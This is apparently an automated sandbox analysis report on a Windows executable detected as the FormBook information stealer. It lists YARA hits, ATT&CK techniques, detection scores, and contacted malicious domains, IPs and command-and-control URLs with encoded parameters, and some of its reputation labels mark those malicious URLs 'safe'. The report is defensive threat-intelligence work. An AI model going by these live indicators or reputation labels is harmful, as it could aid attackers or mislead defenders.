Source: explorer.exe, 00000002.00000002.700359971.00000000008B8000.00000004.00000020.sdmp, cscript.exe, 00000007.00000002.701099735.00000000031C0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.371279762.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 00000007.00000002.701099735.00000000031C0000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: explorer.exe, 00000002.00000000.371279762.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 00000007.00000002.701099735.00000000031C0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Queries volume information: C:\Users\user\Desktop\bXFjrxjRlb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection812	Rootkit1	Credential API Hooking1	Security Software Discovery121	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Masquerading1	Input Capture1	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion3	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Archive Collected Data1	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Disable or Modify Tools1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection812	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Hidden Files and Directories1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Obfuscated Files or Information3	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Software Packing1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
bXFjrxjRlb.exe	27%	Virustotal		Browse
bXFjrxjRlb.exe	28%	ReversingLabs	ByteCode-MSIL.Trojan.Wacatac
bXFjrxjRlb.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.2.AddInProcess32.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
www.getyoursofa.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://ns.adobe.cobj	0%	URL Reputation	safe
http://ns.adobe.cobj	0%	URL Reputation	safe
http://ns.adobe.cobj	0%	URL Reputation	safe
http://www.what3emoji.com/bf3/?pPX=m4Qmgz02ndzlkmzRdXbnUnIUoJvahqq5/3ILTCGwMTubC4gHDN74yJVcJDUGCd+LoHuKsTQ0JA==&W6=jnKpRl-xV	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
http://crl.microsofB	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.inifinityapps.net/bf3/?pPX=swuzFfgzYDLB3Bi4piS9eAlbkrlhpvPYJEwernceI/wmg54lN6WJu/MxY2hInTt8ZuQ329MgbQ==&W6=jnKpRl-xV	0%	Avira URL Cloud	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://ns.ado/1	0%	URL Reputation	safe
http://ns.ado/1	0%	URL Reputation	safe
http://ns.ado/1	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
thehostingroad.com	68.183.162.131	true	true		unknown
what3emoji.com	34.102.136.180	true	true		unknown
www.getyoursofa.com	162.241.30.16	true	true	0%, Virustotal, Browse	unknown
parkingpage.namecheap.com	198.54.117.215	true	false		high
www.thehostingroad.com	unknown	unknown	true		unknown
www.akealuminum.com	unknown	unknown	true		unknown
www.what3emoji.com	unknown	unknown	true		unknown
www.inifinityapps.net	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.what3emoji.com/bf3/?pPX=m4Qmgz02ndzlkmzRdXbnUnIUoJvahqq5/3ILTCGwMTubC4gHDN74yJVcJDUGCd+LoHuKsTQ0JA==&W6=jnKpRl-xV	true	Avira URL Cloud: safe	unknown
http://www.inifinityapps.net/bf3/?pPX=swuzFfgzYDLB3Bi4piS9eAlbkrlhpvPYJEwernceI/wmg54lN6WJu/MxY2hInTt8ZuQ329MgbQ==&W6=jnKpRl-xV	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000002.00000002.700588761.000000000095C000.00000004.00000020.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ns.adobe.cobj	bXFjrxjRlb.exe, 00000000.00000003.355490056.0000000008402000.00000004.00000001.sdmp, bXFjrxjRlb.exe, 00000000.00000003.341220156.00000000083F1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pki.goog/gsr2/GTS1O1.crt0	bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false		high
http://ns.adobe.c/g	bXFjrxjRlb.exe, 00000000.00000003.355490056.0000000008402000.00000004.00000001.sdmp, bXFjrxjRlb.exe, 00000000.00000003.341220156.00000000083F1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.pki.goog/gsr202	bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.goodfont.co.kr	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://pki.goog/repository/0	bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.microsofB	bXFjrxjRlb.exe, 00000000.00000003.349237983.000000000802D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schema.org/WebPage	bXFjrxjRlb.exe, 00000000.00000002.356197969.000000000254F000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false		high
http://ocsp.pki.goog/gts1o1core0	bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pki.goog/GTS1O1core.crl0	bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.fonts.com	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pki.goog/gsr2/gsr2.crl0?	bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	bXFjrxjRlb.exe, 00000000.00000002.356178733.0000000002521000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ns.ado/1	bXFjrxjRlb.exe, 00000000.00000003.355490056.0000000008402000.00000004.00000001.sdmp, bXFjrxjRlb.exe, 00000000.00000003.341220156.00000000083F1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
34.102.136.180	unknown	United States	15169	GOOGLEUS	true
68.183.162.131	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
198.54.117.215	unknown	United States	22612	NAMECHEAP-NETUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	344520
Start date:	26.01.2021
Start time:	16:58:12
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	bXFjrxjRlb.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/2@5/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 10.4% (good quality ratio 9.1%) Quality average: 71.2% Quality standard deviation: 33.2%
HCA Information:	Successful, ratio: 100% Number of executed functions: 93 Number of non-executed functions: 154
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 168.61.161.212, 13.88.21.125, 172.217.23.36, 51.104.139.180, 95.101.22.224, 95.101.22.216, 95.101.27.142, 95.101.27.163, 52.155.217.156, 20.54.26.129, 51.103.5.186, 23.210.248.85 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, www.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, par02p.wns.notify.trafficmanager.net, skypedataprdcolwus15.cloudapp.net Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:59:14	API Interceptor	1x Sleep call for process: bXFjrxjRlb.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
34.102.136.180	xl2Ml2iNJe.exe	Get hash	malicious	Browse	www.ricardoinman.com/xle/?-ZnD=LjoXU6n8-&iBrlPD=43tORsMo6Gry83Td78nIWgxEplzIHXHZqBl7iQpQA31ZPQcRtwVYWDcsKQV/txd+LHV0DSgDXQ==
	v07PSzmSp9.exe	Get hash	malicious	Browse	www.jikzo.com/c8so/?3ff87=Bcwq9mo1SLdxGMzaDRBSbVH3gidTK8xbNEF8M/tGLQ2aKWcuDQCQFtxR7k1oF3yRZXKc&uZWD=XPmPajepJ2gdvnZ
	NEW ORDER.xlsx	Get hash	malicious	Browse	www.simplifiedvirtualsolutions.com/oean/?MdLxlt=mKgmb7I6yODGcWmnOnDfCd0CfDEQGPBdVeZhKsaKMoR3Qh4v4CLN6oxN3p9trG3799qCow==&gnU4Pf=yZPLGZXHl
	Inquiry_73834168_.xlsx	Get hash	malicious	Browse	www.kaiyuansu.pro/incn/?9r_PU=-ZQLEn&e2Jdlzf8=4y+UTKzAJ4dBlp/RYYS74WaP+qCjnKVRzK/jF/x906cXBmLcUo8gxmNUvdqUiR1QG2msPA==
	winlog(1).exe	Get hash	malicious	Browse	www.growingequity.fund/oean/?8pNhXv=yVML0zB0&u4XpH=VZAj6Grbo5w3dBd7w+9BSoe0Fg1VHX3dphJz9/egos9dVzX5qD6mqxE3tIZZ2ImCjS7epxmUBA==
	win32.exe	Get hash	malicious	Browse	www.findthatsmartphone.com/incn/?8pBP5p=/AA5bjKPiaWw22bzCdt7lqNbxAyyPpv3elVlM12b4Zuyr5w4xH0F6TIfefQNvJyZz9qG&L6Ah=2dSLFXghYtFd0
	1-26.exe	Get hash	malicious	Browse	www.catalogcardgames.net/bf3/?UXrxP8=0T3HW8l&URfXx=Sdh36sWiaQaHmuW5OuhNg2ZSKBobeXsq4DWTIDdmgtvI732RtscB8O3t4ssmBmGg4ghZ
	Request.xlsx	Get hash	malicious	Browse	www.cleverwares.com/c8so/?Rf=P253+QYRdhKTDdzjq4pa7Wp7svBpTNddHFol+cUWSKGzAXl94gLhBIvIcI/Xp4fU197lMA==&LDHHp=z4D80PDX
	INV_TMB_210567Y00.xlsx	Get hash	malicious	Browse	www.5050alberta.com/xle/?8pqhs=XuVPlIEgAAku+dXH+MR8cy20ZHkP0iJzlT7lKUj3PYBKa8v0bSmzSfHWFfmBCUSgIWFn2Q==&tDH=XRR8
	RFQ.xlsx	Get hash	malicious	Browse	www.blacknation.info/c8so/?pBU=HzuD_&gb24XB=6ATEh1s0NdZErsRPIUioXmvz20sSLCkN4f+QHjKAbluYenOJN9FSbPt8XJ2H+dMMf4Jp2Q==
	New Year Inquiry List.xlsx	Get hash	malicious	Browse	www.primeoneimplants.com/qjnt/?tB=TtdpPpppFvG&1bwhC=nh3Tl/oLs4HXZ5hiWyD3n36TA5+xQ+CwXb+KxfiJNOta6blp58Sj1H/LHtoCWuUTeWdwKg==
	RF-E93-STD-068 SUPPLIES.xlsx	Get hash	malicious	Browse	www.harperandchloe.com/xle/?5jFlkJJh=FNtvxHF14RtgzuhKSaLd0lIzxL3LkdKZj/Q/Opos8UfLtbug0tkzhu0XdD0TouZ6I/qGUQ==&LR-T=vBK0GdQp
	gPGTcEMoM1.exe	Get hash	malicious	Browse	www.ctfocbdwholesale.com/bw82/?W6=Rxta6xhtzzdBFDuy4SYKtO8XUaMinJcredo77YczPu8Lep1ecFiaWqXH8h2T5haNROfU&odeTY=cnxhAP6x
	bgJPIZIYby.exe	Get hash	malicious	Browse	www.engageautism.info/bw82/?GFND=n1L9MQk6NEQOasYlfxU4KXziLGivOllQbNtATfsC4RjAZctNbAJfQ2EIxV87fcKcU54A&Rlj=YVIX8Hyx
	vA0mtZ7JzJ.exe	Get hash	malicious	Browse	www.brainandbodystrengthcoach.com/csv8/?Mjklsrcx=4rzgp1jZc7l8Whg0IztLQnvubqNqMY/2oz5HEUeZ+SGIDqCjyjtIs6qqwwlb5soGHyjF&Hp0xlh=EVvxc8
	E4Q30tDEB9.exe	Get hash	malicious	Browse	www.conanbiopharma.com/z9n/?GzuX=Jhwq104eoCBg19EU7i3a/UNFlUD6BU+epYAdz34/Q5fuIRMc24e0hydyrjaAvIdaUf1m&9rspoR=ffn0iZa81
	INGNhYonmgtGZ9Updf.exe	Get hash	malicious	Browse	www.4thop.com/ur06/?2d=9rm4l4y&nt=yKWvtfxgXgd1h/cfVfwsL+vVHM9GHRLI6tHsLUWr1fII7HM154cThMJKgGXJGqB7HwFq
	560911_P.EXE	Get hash	malicious	Browse	www.leagueofwomengolfers.com/bf3/?2d=8pJhqv2&mt=Rg5SRlzVdqtJGgbKsvZ2Ay09186BQEC1kuNds6zR1M82qUcQWtSjBMIC0cP/+2kk9Xcq
	RevisedPO.24488_pdf.exe	Get hash	malicious	Browse	www.luxpropertyandassociates.com/nki/?-Z=9rwO08mLgykW/+F5WoH4KAy1ieMCsMl+05AKyLP7HaXoaQuR30wAwJPKQkPQMY0RHvTE&rTILhT=X4XHRfqP
	documents_0084568546754.exe	Get hash	malicious	Browse	www.unlikelypolitician.com/hpg3/?GzuX=AgT4KauKKZQ2JUupBAGVU1xj9lzNj8Soa1/lSyFuPG4dLNFEFBMtgFS5ro8vw6+alj0G&AnB=O2Mxhrspi
68.183.162.131	IMG_1107.EXE	Get hash	malicious	Browse	www.thehostingroad.com/bf3/?DXOX-=l8I6XPguYKFPGKeVh8gT1y9i2fKE+hPHZakSNaciRtP7EZ8w/BzDNNldYjh/9U9ktH10&KzuH=XPjDi0j0G
198.54.117.215	RevisedPO.24488_pdf.exe	Get hash	malicious	Browse	www.doggybargains.com/nki/?-Z=TOQH/B74eY+lLUBsPfn02/AyeWt7NTM3T5MQ11peB6QiRzS5xhI/XYvznkNG9/RZ90Wt&rTILhT=X4XHRfqP
	yxYmHtT7uT.exe	Get hash	malicious	Browse	www.accessible.legal/csv8/?EHU40X=gbWtoXjpHB&Aro=oGqbtMom9WGYi+RBhVD/q4yy78sx6VM5qFnCf+91Xqn8W7yN0ac+rgSlx9DJFvjgpGDVDlUe9g==
